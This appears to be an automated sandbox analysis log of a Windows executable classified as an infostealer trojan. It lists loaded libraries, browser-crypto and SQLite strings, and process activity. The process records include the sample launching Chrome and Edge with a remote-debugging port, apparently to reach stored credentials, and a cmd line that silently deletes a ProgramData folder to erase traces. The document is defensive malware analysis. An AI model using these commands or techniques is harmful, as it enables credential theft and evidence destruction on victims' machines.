Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4B9D90	0_2_6C4B9D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F5E60	0_2_6C4F5E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4CBE70	0_2_6C4CBE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C47DE10	0_2_6C47DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C393EC0	0_2_6C393EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C365F30	0_2_6C365F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C3A5F20	0_2_6C3A5F20

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C4FDAE0 appears 56 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 0061470C appears 287 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C4FD930 appears 45 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C4A9F30 appears 31 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C393620 appears 65 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C399B10 appears 72 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C4F09D0 appears 253 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00622265 appears 73 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00622143 appears 34 times

Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesoftokn3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.3140859753.0000000031E4E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe
Source: file.exe, 00000000.00000002.3137855862.000000002BED3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamefreebl3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.3149404495.0000000043C92000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.3130563158.00000000034C6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs file.exe
Source: file.exe, 00000000.00000002.3143576967.0000000037DBA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamemsvcp140.dll^ vs file.exe
Source: file.exe, 00000000.00000002.3157720711.000000006C545000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.3157889728.000000006F8F2000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@68/282@18/26

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C3D0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C3D0300

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00623101 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,

0_2_00623101

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_006233B3 __ehhandler$?_Copy@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@IAEXII@Z,__EH_prolog3_catch,CoCreateInstance,SysAllocString,_wtoi64,SysFreeString,SysFreeString,

0_2_006233B3

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\EBCI2XLE.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6208:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\delays.tmp

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Command line argument: \c

0_2_00635C30

Source: file.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: C:\Users\user\Desktop\file.exe

File read: C:\$Recycle.Bin\S-1-5-21-2246122658-3693405117-2476756634-1003\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: file.exe, file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.3151909199.0000000049C03000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.3157602062.000000006C4FF000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: file.exe, 00000000.00000003.2573599457.00000000034A5000.00000004.00000020.00020000.00000000.sdmp, AAKKKEBFC.0.dr, FIIEHJDBK.0.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.3134606947.0000000023C32000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3134315854.00000000216F8000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.3146535716.000000003DD25000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe

ReversingLabs: Detection: 65%

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2536,i,5756797432895461405,5854280884996212389,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2316,i,7298558400750836120,13581212135822597317,262144 /prefetch:3
Source: unknown	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:3
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6732 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAAFBFBAAKEC" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6736 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAAFBFBAAKEC" & exit	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2628 --field-trial-handle=2536,i,5756797432895461405,5854280884996212389,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2464 --field-trial-handle=2316,i,7298558400750836120,13581212135822597317,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2208 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:3	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BAAFBFBAAKEC" & exit	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=5252 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6732 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6736 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6736 --field-trial-handle=1992,i,17524230458536271721,5938116588268817671,262144 /prefetch:8	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
